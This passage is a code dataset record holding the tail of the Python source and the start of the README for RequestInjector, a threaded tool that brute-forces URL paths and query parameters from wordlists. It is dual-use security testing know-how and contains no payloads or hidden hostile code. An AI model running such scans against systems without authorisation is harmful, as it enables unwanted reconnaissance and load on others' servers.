format\n\t\t\t# TODO: encodings and obfuscations\n\t\t\ti = i.strip() + \"=\" + word.strip()\n\t\t\tl.append(i)\n\t\t#\n\t\t# append static args to the ones generated above\n\t\tif isinstance(self.staticargs, list):\n\t\t\tl = l + self.staticargs\n\t\treturn(l)\n\n\tdef run(self):\n#\t\tprint(f\"\\033[95m{self.name}\\033[0m opening {self.wordlist}\") # purple\n\t\t# self.wordlist is a list, and this attacktype only accepts the first wordlist\n\t\twith open(self.wordlist[0], \"r\") as f:\n\t\t\tfor line in f:\n\t\t\t\tline = str(line).strip()\n\t\t\t\tline = self.makeArg(line)\n\t\t\t\t#\n\t\t\t\t# build a new list not containing empty values\n\t\t\t\tl = [i for i in line if len(i) > 0]\n\t\t\t\t#\n\t\t\t\t# take the list and turn it into a format ready to be pasted onto a URL\n\t\t\t\tif len(l) > 1:\n\t\t\t\t\txxx = \"&\".join(l) # a query string ready to be appended\n\t\t\t\telse:\n\t\t\t\t\txxx = \"\".join(l) # smash the list into an empty string or a string containing just the first element\n\t\t\t\tself.queue.put(xxx)\n#\t\t\t\tprint(f\"\\033[95m{self.name}\\033[0m placed {line} into queuein\") # purple\n\t\tf.close()\n\n\n\nclass ArgTridentFiller(Filler):\n\t\"\"\"fills the queue based on arg mode + trident attacktype requirements\"\"\"\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\n\tdef run(self):\n\t\twith ExitStack() as stack:\n\t\t\t# open all files at once using the ExitStack context manager\n\t\t\tfiles = [stack.enter_context(open(fname, \"r\")) for fname in self.wordlist]\n\t\t\t# in each file, get a row at the same time, zip() them, and put the output into the queue\n\t\t\tfor (rows) in zip(*files):\n\t\t\t\t# clean each item\n\t\t\t\trows = [r.strip() for r in rows]\n\t\t\t\t# zip the keys and row items into a new tuple\n\t\t\t\tx = [x for x in zip(self.injectkeys,rows)]\n\t\t\t\t# turn the tuples into key=value pairs for using in a URL query\n\t\t\t\txx = [\"=\".join(a) for a in x]\n\t\t\t\t#\n\t\t\t\t# append static args to the ones generated above\n\t\t\t\tif isinstance(self.staticargs, list):\n\t\t\t\t\txx = xx + self.staticargs\n\t\t\t\t#\n\t\t\t\t# build a new list not containing empty values\n\t\t\t\tl = [i for i in xx if len(i) > 0]\n\t\t\t\t#\n\t\t\t\t# take the list and turn it into a format ready to be pasted onto a URL\n\t\t\t\tif len(l) > 1:\n\t\t\t\t\txxx = \"&\".join(l) # a query string ready to be appended\n\t\t\t\telse:\n\t\t\t\t\txxx = \"\".join(l) # smash the list into an empty string or a string containing just the first element\n\t\t\t\t# place the key1=value1&key2=value2... string into the queue\n\t\t\t\tself.queue.put(xxx)\n\n\nclass ArgTridentLongestFiller(Filler):\n\t\"\"\"fills the queue based on arg mode + trident attacktype + --longest requirements\"\"\"\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\n\tdef run(self):\n\t\twith ExitStack() as stack:\n\t\t\t# open all files at once using the ExitStack context manager\n\t\t\tfiles = [stack.enter_context(open(fname, \"r\")) for fname in self.wordlist]\n\t\t\t# in each file, get a row at the same time, itertools.zip_longest() them, and put the output into the queue\n\t\t\tfor (rows) in itertools.zip_longest(*files, fillvalue=self.fillvalue):\n\t\t\t\t# clean each item\n\t\t\t\trows = [r.strip() for r in rows]\n\t\t\t\t# zip the keys and row items into a new tuple\n\t\t\t\tx = [x for x in zip(self.injectkeys,rows)]\n\t\t\t\t# turn the tuples into key=value pairs for using in a URL query\n\t\t\t\txx = [\"=\".join(a) for a in x]\n\t\t\t\t#\n\t\t\t\t# append static args to the ones generated above\n\t\t\t\tif isinstance(self.staticargs, list):\n\t\t\t\t\txx = xx + self.staticargs\n\t\t\t\t#\n\t\t\t\t# build a new list not containing empty values\n\t\t\t\tl = [i for i in xx if len(i) > 0]\n\t\t\t\t#\n\t\t\t\t# take the list and turn it into a format ready to be pasted onto a URL\n\t\t\t\tif len(l) > 1:\n\t\t\t\t\txxx = \"&\".join(l) # a query string ready to be appended\n\t\t\t\telse:\n\t\t\t\t\txxx = \"\".join(l) # smash the list into an empty string or a string containing just the first element\n\t\t\t\t# place the key1=value1&key2=value2... string into the queue\n\t\t\t\tself.queue.put(xxx)\n\n\n\n#================================================\n#\n# Processing Classes\n#\n#================================================\n\n\n\nclass ProcessUrl:\n\t\"\"\"preps URL variations/mutations for different modes\"\"\"\n\tdef __init__(self, url=\"\", mutate=False, mode=None):\n\t\tself.output = []\n\t\tself.url = self.run(url, mode) # preps/fixes the URL according to the mode\n\t\tself.output.append(self.url)\n\t\tself.mode = mode\n\t\tif not self.mode:\n\t\t\tprint(\"EXCEPTION: ProcessUrl requires a mode argument\")\n\t\t\tsys.exit(1)\n\t\tif mutate:\n\t\t\tself.output = self.mutate(self.url, self.mode)\n\t\t\tself.output.append(self.url)\n\t\t\tself.output = sorted(list(set(self.output)), key=len)\n\t\n\tdef mutate(self, url, mode) -> list:\n\t\t\"\"\"handles mutations and returns a list, to later be placed into the queue\"\"\"\n\t\tif mode == \"path\":\n\t\t\treturn(self.mutatePath(url, mode))\n\t\telif mode == \"arg\":\n\t\t\treturn(self.mutateArg(url, mode))\n\n\tdef mutatePath(self, url, mode) -> list:\n\t\t\"\"\"produces a list of each URL variation based on trimming paths down to the base URL\"\"\"\n\t\t# example: https://example.internal/a/b/c --> https://example.internal/, https://example.internal/a/, https://example.internal/a/b/, https://example.internal/a/b/c/\n\t\tl = []\n\t\tu = urlparse(url)\n\t\tif len(u.path) > 1 and \"/\" in u.path:\n\t\t\tpathsplit = [i for i in u.path.split(\"/\") if len(i) > 0] # a leading slash makes an entry 0 bytes long at index 0\n\t\t\tbaseurl = u.scheme+\"://\"+u.netloc+\"/\" # baseurl now ends with a slash\n\t\t\tl.append(self.run(baseurl, mode))\n\t\t\tfor p in pathsplit:\n\t\t\t\tbaseurl = self.run(baseurl+p, mode) # additional checking\n\t\t\t\tl.append(baseurl)\n\t\t# no \"else\" logic becuase __init__ already puts the checked URL into the list after this function is called\n\t\treturn(l)\n\n\tdef mutateArg(self, url, mode) -> list:\n\t\t\"\"\"nyi\"\"\"\n\t\treturn([url])\n\n\tdef run(self, url, mode) -> str:\n\t\t\"\"\"prep the URL for mutations and queue placement\"\"\"\n\t\t# ensure that a given URL is stripped to just the path, and ends in a trailing slash, ex. https://example.internal/a/b/c --> https://example.internal/a/b/c/\n\t\tif mode == \"path\":\n\t\t\tu = urlparse(url)\n\t\t\tp = u.path\n\t\t\tif not p.endswith(\"/\"):\n\t\t\t\tp = p + \"/\"\n\t\t\tuu = u.scheme+\"://\"+u.netloc+p\n\t\t\treturn(uu)\n\t\telif mode == \"arg\":\n\t\t\t# nyi, prep URL fix actions here before sending to mutate\n\t\t\treturn(url)\n\n\tdef __repr__(self) -> str:\n\t\treturn(self.url)\n\n\n\n#================================================\n#\n# Worker Classes\n#\n#================================================\n\n\n\nclass Worker(threading.Thread):\n\t\"\"\"parent class that retrieves an item from the input queue, makes a web request, and places the results into an output queue\"\"\"\n\tdef __init__(self, *args, **kwargs):\n\t\tthreading.Thread.__init__(self)\n\t\tself.setDaemon(True)\n\t\tself.name = threading.current_thread().name\n\t\tself.queuein = kwargs.get(\"queuein\")\n\t\tself.queueout = kwargs.get(\"queueout\")\n\t\tself.urls = kwargs.get(\"urls\")\n\t\tself.proxy = kwargs.get(\"proxy\")\n\t\tself.headers = kwargs.get(\"headers\")\n\t\tif not self.headers:\n\t\t\tself.headers = {}\n\t\tself.header_default_useragent = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0\"\n\t\tself.header_default_accept = \"text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\"\n\t\tself.url_encode = kwargs.get(\"url_encode\")\n\t\tself.retries = kwargs.get(\"retries\")\n\t\tself.delay = kwargs.get(\"delay\")\n\t\tif len(self.headers) == 0:\n\t\t\tself.headers = {'User-Agent':self.header_default_useragent, 'Accept':self.header_default_accept}\n\t\telse:\n\t\t\tif \"User-Agent\" not in self.headers:\n\t\t\t\tself.headers[\"User-Agent\"] = self.header_default_useragent\n\t\t\tif \"Accept\" not in self.headers:\n\t\t\t\tself.headers[\"Accept\"] = self.header_default_accept\n\t\tif not self.retries:\n\t\t\tself.retries = 1\n\t\tself.bad_domains = {} # tracks domains that raise requests.exceptions.ReadTimeout\n\n\tdef badDomainChecker(self, domain):\n\t\t\"\"\"tracks domains that raise requests.exceptions.ReadTimeout\"\"\"\n\t\tif domain not in self.bad_domains.keys():\n\t\t\t#sys.stderr.write(f\"\\033[91mINFO {self.name}: BAD DOMAIN ADDED: {domain}\\033[0m\\n\") # red\n\t\t\tself.bad_domains[domain] = 1\n\t\telif domain in self.bad_domains.keys():\n\t\t\t#sys.stderr.write(f\"\\033[91mINFO {self.name}: BAD DOMAIN COUNT FOR: {domain} {self.bad_domains[domain]}\\033[0m\\n\") # red\n\t\t\tself.bad_domains[domain] += 1\n\n\tdef prepareUrl(self, url):\n\t\t\"\"\"this will be inherited downstream for modification\"\"\"\n\t\treturn(url)\n\n\tdef makeRequest(self, url, item):\n\t\t\"\"\"handles web request logic\"\"\"\n\t\ttry:\n\t\t\t# set a flag that determines if the request gets made or not, depending on if a domain is responsive or not based on self.badDomainChecker() and self.bad_domains\n\t\t\texecute = \"yes\"\n\t\t\tdomain = urlparse(url).netloc\n\t\t\t# check if the domain is in a thread-internal \"known bad / unresponsive\" dictionary\n\t\t\tif domain in self.bad_domains.keys():\n\t\t\t\tif self.bad_domains[domain] >= self.retries:\n\t\t\t\t\texecute = \"no\"\n\t\t\tif execute == \"yes\":\n\t\t\t\t# word (current queue item) is appended to the URL here\n\t\t\t\turl = url+item\n\t\t\t\t#print(f\"\\033[94m{self.name}\\033[0m requesting website: {url}\") # blue\n\t\t\t\t# make the request, using given (or default) headers, allowing redirects, no TLS validation, given proxies, 3-second timeout, and streaming data\n\t\t\t\t# stream=True means the response body content is not downloaded until the .content attribute is accessed, plus raw info (IP etc) can be accessed\n\t\t\t\t# https://docs.python-requests.org/en/master/user/advanced/#body-content-workflow\n\t\t\t\tr = requests.get(url, headers=self.headers, allow_redirects=True, verify=False, proxies=self.proxy, timeout=3, stream=True)\n\t\t\t\t# handle response content\n\t\t\t\t# future: send all content to another object for processing\n\t\t\t\tip = r.raw._fp.fp.raw._sock.getpeername() # socket into only accessible if stream=True and before .content attribute is called (note this will be the proxy IP/port if one is used)\n\t\t\t\tsc = r.status_code\n\t\t\t\tsz = len(r.content) # length of body content, which should (but will not always) match the Content-Length header\n\t\t\t\tr.close() # ALWAYS close a streaming connection\n\t\t\t\t#print(f\"status_code:{sc} bytes:{sz} word:{item} ip:{ip[0]} port:{ip[1]} url:{url}\")\n\t\t\t\treturn(f\"status_code:{sc} bytes:{sz} word:{item} ip:{ip[0]} port:{ip[1]} url:{url}\")\n\t\t\telse:\n\t\t\t\treturn(f\"EXCEPTION {self.name}: {url} REASON: requests.exceptions.ReadTimeout EXTRA: hit max internal allowed retries: ({self.retries})\") # note this pseudo-exception will get displayed on stderr by Drainer\n\t\texcept Exception as e:\n\t\t\t# if the domain generates an exception, increment its counter in the dictionary\n\t\t\tself.badDomainChecker(domain)\n\t\t\treturn(f\"EXCEPTION {self.name}: {url} REASON: requests.exceptions.ReadTimeout EXTRA: count: {self.bad_domains[domain]}, max allowed: {self.retries}\") # note this exception will get displayed on stderr by Drainer\n\n\n\tdef run(self):\n\t\t\"\"\"invoke the request\"\"\"\n\t\twhile True:\n\t\t\t# get item to work on from first queue\n\t\t\titem = self.queuein.get()\n#\t\t\tprint(f\"\\033[94m{self.name}\\033[0m got item from queuein: {item}\") # blue\n\t\t\t# process that item for each URL variation\n\t\t\tfor url in self.urls:\n\t\t\t\t# prepareUrl() will be different for each type (path, arg, etc) and is modified in the subclass\n\t\t\t\turl = self.prepareUrl(url)\n#\t\t\t\tprint(f\"\\033[94m{self.name}\\033[0m prepped {url}\") # blue\n\t\t\t\tif self.delay:\n\t\t\t\t\ttime.sleep(self.delay)\n\t\t\t\tresult = self.makeRequest(url, item)\n\t\t\t\t# put the result of each url+item request into the second queue\n\t\t\t\tself.queueout.put(result)\n#\t\t\t\ts = f\"\\033[94m{self.name}\\033[0m put item into queueout: {result}\" # blue\n\t\t\t# tell queuein the task is finished (for the queue.join() at the end)\n\t\t\tself.queuein.task_done()\n\n\n\nclass PathWorker(Worker):\n\t\"\"\"performs web requests according to path mode requirements\"\"\"\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\n\tdef prepareUrl(self, url):\n\t# extra logic to double-check that the URL has a trailing slash, but ProcessUrl should handle this properly\n\t\tif not url.endswith(\"/\"):\n\t\t\turl = url + \"/\"\n\t\treturn(url)\n\n\n\nclass ArgWorker(Worker):\n\t\"\"\"performs web requests according to arg mode requirements\"\"\"\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\n\tdef prepareUrl(self, url):\n\t# extra logic to double-check that the URL has no trailing slash\n\t\tif url.endswith(\"/\"):\n\t\t\turl = url.rstrip(\"/\")\n\t\tif not url.endswith(\"?\"):\n\t\t\turl = url + \"?\"\n\t\treturn(url)\n\n\n\n#================================================\n#\n# Drainer Classes (Output Handlers)\n#\n#================================================\n\n\n\nclass Drainer(threading.Thread):\n\t\"\"\"provides output management\"\"\"\n\tdef __init__(self, queue, color=False, output_file=\"\", simple_output=False):\n\t\tthreading.Thread.__init__(self)\n\t\tself.setDaemon(True)\n\t\tself.queue = queue\n\t\tself.name = threading.current_thread().name\n\t\tself.color = color\n\t\tself.output_file = output_file\n\t\tself.simple_output = simple_output\n\n\tdef printToTerminal(self, item):\n\t\t\"\"\"handles sending full and condensed output to stdout/stderr\"\"\"\n\t\tif \"EXCEPTION\" not in str(item) and \"REASON\" not in str(item) and \"INFO\" not in str(item):\n\t\t\tif self.simple_output or self.color:\n\t\t\t\ts = str(item).split()[0].split(\"status_code:\")[1]\n\t\t\t\tu = str(item).split(\"url:\")[1]\n\t\t\t\t# rejoin into a single string\n\t\t\t\titem = s + \" \" + u\n\t\t\tif self.color:\n\t\t\t\tif str(item)[0].isdigit():\n\t\t\t\t\titem = str(item).split()\n\t\t\t\t\tif item[0][0] == \"1\":\n\t\t\t\t\t\titem[0] = \"\\033[94m\" + item[0] + \"\\033[0m\" # blue + reset code\n\t\t\t\t\telif item[0][0] == \"2\":\n\t\t\t\t\t\titem[0] = \"\\033[92m\" + item[0] + \"\\033[0m\" # green + reset code\n\t\t\t\t\telif item[0][0] == \"3\":\n\t\t\t\t\t\titem[0] = \"\\033[93m\" + item[0] + \"\\033[0m\" # yellow + reset code\n\t\t\t\t\telif item[0][0] == \"4\":\n\t\t\t\t\t\titem[0] = \"\\033[91m\" + item[0] + \"\\033[0m\" # red + reset code\n\t\t\t\t\telif item[0][0] == \"5\":\n\t\t\t\t\t\titem[0] = \"\\033[95m\" + item[0] + \"\\033[0m\" # purple + reset code\n\t\t\t\t\t# rejoin into a single string\n\t\t\t\t\titem = \" \".join(item)\n\t\t\tprint(item)\n\t\telse:\n\t\t\tsys.stderr.write(f\"{item}\\n\")\n\n\tdef run(self):\n\t\t\"\"\"dispatches output handling\"\"\"\n\t\twhile True:\n\t\t\titem = self.queue.get()\n#\t\t\tprint(f\"\\033[33m{self.name}\\033[0m removed from queueout:\\t{item}\") # gold\n\t\t\tif item is None:\n\t\t\t\tbreak\n\t\t\tself.printToTerminal(item)\n\t\t\tself.queue.task_done()\n\n\n\n#================================================\n#\n# Primary Object\n#\n#================================================\n\n\n\nclass RequestInjector:\n\t\"\"\"main handler to dispatch threaded objects\"\"\"\n\tdef __init__(self, url, wordlist, staticargs, injectkeys, longest, fillvalue, delay=0.0, mode=\"path\", attacktype=None, threads=5, mutate=False, headers={}, proxy={}, retries=None, url_encode=False, simple_output=False, color=False):\n\t\tself.wordlist = wordlist\n\t\tself.mode = mode\n\t\tself.attacktype = attacktype\n\t\tself.staticargs = staticargs\n\t\tself.injectkeys = injectkeys\n\t\tself.longest = longest\n\t\tself.fillvalue = fillvalue\n\t\tself.delay = delay\n\t\tself.threads = threads\n\t\tself.mutate = mutate\n\t\t# convert the url to a list of url(s)\n\t\t# TODO - self.url depends on the mode, and ProcessUrl should be called in the handlers\n\t\tself.url = ProcessUrl(url=url, mutate=self.mutate, mode=self.mode).output # list\n\t\tself.headers = headers\n\t\tself.proxy = proxy\n\t\tself.retries = retries\n\t\tself.url_encode = url_encode\n\t\tself.simple_output = simple_output\n\t\tself.color = color\n\n\tdef preflightChecks(self):\n\t\t\"\"\"sanity checks for various mode requirements\"\"\"\n\t\t# check that mode is approved\n\t\tif not self.mode in [\"path\", \"arg\", \"body\"]:\n\t\t\tprint(\"Error: mode not one of: path, arg, body\")\n\t\t\tsys.exit(1)\n\t\t# checks for path mode\n\t\tif not self.wordlist and self.mode == \"path\":\n\t\t\tprint(\"Error: mode set to path, but no wordlist provided (-w/--wordlist WORDLIST)\")\n\t\t\tsys.exit(1)\n\t\t# check that if --longest is used, --fillvalue VALUE is also specified\n\t\tif self.longest and self.fillvalue == \"\":\n\t\t\tprint(\"Error: --longest was specified, but no filler value was provided for inevitable nulls (-F/--fillvalue VALUE)\")\n\t\t\tsys.exit(1)\n\t\t# TODO - ADD MODE HANDLERS HERE SO run() CAN DISPATCH THESE FOR READABILITY\n\n\tdef run(self):\n\t\t\"\"\"dispatch threads to perform specified actions\"\"\"\n\t\t# sanity checks first\n\t\tself.preflightChecks()\n\t\t# this queue gets filled with words from the wordlist\n\t\tqueuein = queue.Queue()\n\t\t# this queue gets filled with the web request results\n\t\tqueueout = queue.Queue()\n\t\t# hold thread objects here to be joined\n\t\tthreads = []\n\t\t# begin loading words into queuein using Fillers\n\t\t# worker threads read from queuein and send results to queueout\n\t\t# each thread gets a word and checks it against all URLs\n\t\t#\n\t\t# path mode\n\t\tif self.mode == \"path\":\n\t\t\tf = PathFiller(queue=queuein, wordlist=self.wordlist)\n\t\t\tf.name = \"PathFiller\"\n\t\t\tf.start()\n\t\t\tthreads.append(f)\n\t\t\tfor i in range(self.threads):\n\t\t\t\tw = PathWorker(queuein=queuein, queueout=queueout, delay=self.delay, urls=self.url, headers=self.headers, proxy=self.proxy, retries=self.retries)\n\t\t\t\tw.name = f\"Worker-{i}\"\n\t\t\t\t#print(f\"starting Worker-{i}\")\n\t\t\t\tw.start()\n\t\t\t\tthreads.append(w)\n\t\t#\n\t\t# arg mode\n\t\telif self.mode == \"arg\":\n\t\t\t#\n\t\t\t# shotgun attacktype\n\t\t\tif self.attacktype == \"shotgun\":\n\t\t\t\tf = ArgShotgunFiller(queue=queuein, wordlist=self.wordlist, injectkeys=self.injectkeys, staticargs=self.staticargs)\n\t\t\t\tf.name = \"ArgShotgunFiller\"\n\t\t\t#\n\t\t\t# trident attacktype\n\t\t\telif self.attacktype == \"trident\":\n\t\t\t\tif not self.longest:\n\t\t\t\t\tf = ArgTridentFiller(queue=queuein, wordlist=self.wordlist, injectkeys=self.injectkeys, staticargs=self.staticargs)\n\t\t\t\telse:\n\t\t\t\t\tf = ArgTridentLongestFiller(queue=queuein, wordlist=self.wordlist, injectkeys=self.injectkeys, staticargs=self.staticargs, longest=self.longest, fillvalue=self.fillvalue)\n\t\t\t\tf.name = \"ArgTridentFiller\"\n\t\t\tf.start()\n\t\t\tthreads.append(f)\n\t\t\tfor i in range(self.threads):\n\t\t\t\tw = ArgWorker(queuein=queuein, queueout=queueout, delay=self.delay, urls=self.url, headers=self.headers, proxy=self.proxy, retries=self.retries)\n\t\t\t\tw.name = f\"Worker-{i}\"\n\t\t\t\t#print(f\"starting Worker-{i}\")\n\t\t\t\tw.start()\n\t\t\t\tthreads.append(w)\n\t\t#\n\t\t# thread to handle output\n\t\td = Drainer(queueout, simple_output=self.simple_output, color=self.color)\n\t\td.name = \"Drainer\"\n\t\td.start()\n\t\tthreads.append(d)\n\t\t#\n\t\t# do not join daemon threads, but do check queue sizes\n\t\t# ensure the daemon threads have finished by checking that the queues are empty\n\t\t#print(\"\\033[33;7mqueuein is empty\\033[0m\") # gold background\n\t\tqueuein.join()\n\t\t#print(\"\\033[33;7mqueueout is empty\\033[0m\") # gold background\n\t\tqueueout.join()\n\n\n\n#================================================\n#\n# Entrypoint Functions\n#\n#================================================\n\n\n\ndef tool_entrypoint():\n\t\"\"\"this function handles argparse arguments and serves as the entry_points reference in setup.py\"\"\"\n\t# collect command line arguments\n\tparser = argparse.ArgumentParser(description=\"RequestInjector: scan a URL using one or more given wordlists with optional URL transformations\")\n\t# required arguments\n\treq = parser.add_argument_group(\"required arguments\")\n\treq.add_argument(\"-u\", \"--url\", dest=\"url\", type=str, help=\"provide a URL to check\", required=True)\n\t# general arguments\n\tgen = parser.add_argument_group(\"general arguments\")\n\tgen.add_argument(\"-w\", \"--wordlist\", dest=\"wordlist\", type=str, help=\"provide a wordlist (file) location, or multiple comma-separated files in a string, ex. -w /home/user/words1.txt or -w /home/user/words1.txt,/home/user/words2.txt, etc\")\n\tgen.add_argument(\"-M\", \"--mode\", dest=\"mode\", default=\"path\", type=str, help=\"provide a mode (path|arg|body(NYI)) (default path)\")\n\tgen.add_argument(\"-H\", \"--headers\", dest=\"headers\", default={}, type=json.loads, help=\"provide a dictionary of headers to include, with single-quotes wrapping the dictionary and double-quotes wrapping the keys and values, ex. '{\\\"Content-Type\\\": \\\"application/json\\\"}' (defaults to a Firefox User-Agent and Accept: text/html) *note default is set inside PathWorker class*\")\n\tgen.add_argument(\"-p\", \"--proxy\", dest=\"proxy\", default={}, type=json.loads, help=\"provide a dictionary of proxies to use, with single-quotes wrapping the dictionary and double-quotes wrapping the keys and values, ex. '{\\\"http\\\": \\\"http://127.0.0.1:8080\\\", \\\"https\\\": \\\"https://127.0.0.1:8080\\\"}'\")\n\tgen.add_argument(\"-r\", \"--retries\", dest=\"retries\", default=1, type=int, help=\"provide the number of times to retry a connection (default 1)\")\n\tgen.add_argument(\"-t\", \"--threads\", dest=\"threads\", default=10, type=int, help=\"provide the number of threads for making requests (default 10)\")\n\tgen.add_argument(\"-d\", \"--delay\", dest=\"delay\", default=0.0, type=float, help=\"provide a delay between requests, per thread, as a float (default 0.0); use fewer threads and longer delays if the goal is to be less noisy, although the amount of requests will remain the same\")\n\tgen.add_argument(\"-m\", \"--mutate\", dest=\"mutate\", action=\"store_true\", help=\"provide if mutations should be applied to the checked URL+word (currently only supports path mode, arg mode support nyi)\")\n\t# arg mode-specific arguments\n\tams = parser.add_argument_group(\"arg mode-specific arguments\")\n\tams.add_argument(\"-T\", \"--attacktype\", dest=\"attacktype\", default=\"shotgun\", type=str, help=\"provide an attack type (shotgun|trident); shotgun is similar to Burp Suite's sniper and battering ram modes, and trident is similar to pitchfork (default shotgun)\")\n\tams.add_argument(\"--longest\", dest=\"longest\", action=\"store_true\", help=\"provide if you wish to fully exhaust the longest wordlist using the trident attacktype, and not stop when the end of shortest wordlist has been reached (zip() vis itertools.zip_longest()\")\n\tams.add_argument(\"-F\", \"--fillvalue\", dest=\"fillvalue\", default=\"\", type=str, help=\"provide a string to use in null values when using --longest with the trident attacktype (such as when using two wordlists of differing lengths; the fillvalue will be used when the shortest wordlist has finished, but terms are still being used from the longest wordlist)\")\n\tams.add_argument(\"-S\", \"--staticargs\", dest=\"staticargs\", default=\"\", type=str, help=\"provide a string of static key=value pairs to include in each request, appended to the end of the query, as a comma-separated string, ex. key1=val1,key2=val2 etc\")\n\tams.add_argument(\"-K\", \"--injectkeys\", dest=\"injectkeys\", default=\"\", type=str, help=\"provide a string of keys to be used; using the shotgun attacktype, each key will receive values from only the first wordlist; using the trident attacktype, each key must have a specifc wordlist specified in the matching position with the -w WORDLIST option; ex. '-T trident -K user,account,sid -w userwords.txt,accountids.txt,sids.txt'\")\n\t# output arguments\n\tota = parser.add_argument_group(\"output arguments\")\n\tota.add_argument(\"--color\", dest=\"color\", action=\"store_true\", help=\"provide if stdout should have colorized status codes (will force simple_output format)\")\n\tota.add_argument(\"--simple_output\", dest=\"simple_output\", action=\"store_true\", help=\"provide for simplified output, just status code and URL, ex. 200 http://example.com\")\n\t# get arguments as variables\n\targs = vars(parser.parse_args())\n\theaders = args[\"headers\"]\n\tmutate = args[\"mutate\"]\n\tproxy = args[\"proxy\"]\n\tretries = args[\"retries\"]\n\tthreads = args[\"threads\"]\n\tdelay = args[\"delay\"]\n\turl = args[\"url\"]\n\twordlist = args[\"wordlist\"].split(\",\")\n\tmode = args[\"mode\"]\n\tattacktype = args[\"attacktype\"]\n\tstaticargs = args[\"staticargs\"].split(\",\")\n\tinjectkeys = args[\"injectkeys\"].split(\",\")\n#\tinjectvalues = args[\"injectvalues\"].split(\",\")\n\tcolor = args[\"color\"]\n\tsimple_output = args[\"simple_output\"]\n\tlongest = args[\"longest\"]\n\tfillvalue = args[\"fillvalue\"]\n\t#\n\t# initialize and run the primary object (RequestInjector)\n\tx = RequestInjector(url=url, wordlist=wordlist, mode=mode, attacktype=attacktype, staticargs=staticargs, injectkeys=injectkeys, threads=threads, delay=delay, longest=longest, fillvalue=fillvalue, mutate=mutate, headers=headers, proxy=proxy, retries=retries, simple_output=simple_output, color=color) #, simple_output=True)\n\tx.run()\n\n\n\n#================================================\n#\n# Execution Guard\n#\n#================================================\n\n\n\n# this allows the script to be invoked directly (if the repo was cloned, if just this file was downloaded and placed in some bin path, etc)\n# note the time message gets sent to stderr, just 2> /dev/null or comment it out if undesired\nif __name__ == \"__main__\":\n\n\t# time script execution\n\tstartTime = time.time()\n\n\ttool_entrypoint()\n\n\t# time script execution\n\tendTime = time.time()\n\ttotalTime = endTime - startTime\n\tsys.stderr.write(f\"took {totalTime} seconds\\n\")\n\tsys.exit(0)"
},
{
"alpha_fraction": 0.6269450783729553,
"alphanum_fraction": 0.653793454170227,
"avg_line_length": 52.93043518066406,
"blob_id": "39bb676c5380343ae951bc2600d7cc6fd5185c46",
"content_id": "ac5efb0849604e07ae7a343adf12ebabdf6f4ba2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 12403,
"license_type": "permissive",
"max_line_length": 274,
"num_lines": 230,
"path": "/README.md",
"repo_name": "bonifield/RequestInjector",
"src_encoding": "UTF-8",
"text": "# RequestInjector\nscan a URL using one or more given wordlists with optional URL transformations\n\n### What is RequestInjector?\nThis tool scans a single URL at a time, using wordlists to try various path combinations and key/value query pairs. RequestInjector is a single standalone script that can be kept in a tools folder until needed, or installed directly via pip and accessed directly from $PATH.\n- in `path` mode (`-m path`), try all words against a URL path, with optional mutations\n\t- given the URL \"http://example.com/somepath/a/b/c\", a wordlist to pull terms from, and -m/--mutate specified, worker threads will try each mutation of the URL and the current term (WORD):\n\t\t- \"http://example.com/WORD\", \"http://example.com/somepath/WORD\", \"http://example.com/somepath/a/WORD\", \"http://example.com/somepath/a/b/WORD\", \"http://example.com/somepath/a/b/c/WORD\"\n- in `arg` mode (`-m arg`), try all words against a specified set of keys\n\t- using the `shotgun` attacktype (`-T shotgun`), provide a single wordlist against one or more keys (similar to Burp Suite's Intruder modes Sniper and Battering Ram)\n\t- using the `trident` attacktype (`-T trident`), provide one wordlist per key, and terminate upon reaching either the end of the shortest wordlist (default) or the longest (`--longest --fillvalue VALUE`) (similar to Burp Suite's Intruder mode Pitchfork)\n- in `body` mode (`-m body`), use a template to submit dynamic body content to a given target, utilizing either the `shotgun` or `trident` attacktype (also supports URL-based modes above)\n\t- `body` is not yet implemented\n\n\n### Installation [GitHub](https://github.com/bonifield/RequestInjector) [PyPi](https://pypi.org/project/requestinjector/)\n```\npip install requestinjector\n# will become available directly from $PATH as either \"requestinjector\" or \"ri\"\n```\n\n### Usage (Command Line Tool or Standalone Script Somewhere in $PATH)\n```\nv0.9.4\nLast Updated: 2021-09-21\n\npath mode (-M path):\n\t# NOTE - although -w accepts a comma-separated list of wordlists as a string, only the first one will be used for this mode\n\t\trequestinjector -u \"http://example.com/somepath/a/b/c\" \\\n\t\t-M path \\\n\t\t-w \"/path/to/wordlist.txt\" \\\n\t\t-t 10 \\\n\t\t-r 2 \\\n\t\t-m \\\n\t\t-p '{\"http\": \"http://127.0.0.1:8080\", \"https\": \"https://127.0.0.1:8080\"}' \\\n\t\t-H '{\"Content-Type\": \"text/plain\"}' \\\n\t\t--color\n\narg mode (-M arg) using shotgun attacktype (-T shotgun):\n\t# NOTE - shotgun is similar to Burp Suite's sniper and battering ram modes; provide one or more keys, and a single wordlist\n\t# NOTE - although -w accepts a comma-separated list of wordlists as a string, only the first one will be used for this attacktype\n\t# NOTE - mutations (-m) not yet available for arg mode\n\t\trequestinjector -u \"http://example.com/somepath/a/b/c\" \\\n\t\t-M arg \\\n\t\t-T shotgun \\\n\t\t-K key1,key2,key3,key4 \\\n\t\t-w \"/path/to/wordlist.txt\" \\\n\t\t-S statickey1=staticval1,statickey2=staticval2 \\\n\t\t-t 10 \\\n\t\t-r 2 \\\n\t\t-p '{\"http\": \"http://127.0.0.1:8080\", \"https\": \"https://127.0.0.1:8080\"}' \\\n\t\t-H '{\"Content-Type\": \"text/plain\"}' \\\n\t\t--color\n\narg mode (-M arg) using trident attacktype (-T trident), and optional static arguments (-S):\n\t# NOTE - trident is similar to Burp Suite's pitchfork mode; for each key specified, provided a wordlist (-w WORDLIST1,WORDLIST2,etc); specify the same wordlist multiple times if using this attacktype and you want the same wordlist in multiple positions\n\t# NOTE - this type will run through to the end of the shortest provided wordlist; use --longest and --fillvalue VALUE to run through the longest provided wordlist instead\n\t# NOTE - mutations (-m) not yet available for arg mode\n\t\trequestinjector -u \"http://example.com/somepath/a/b/c\" \\\n\t\t-M 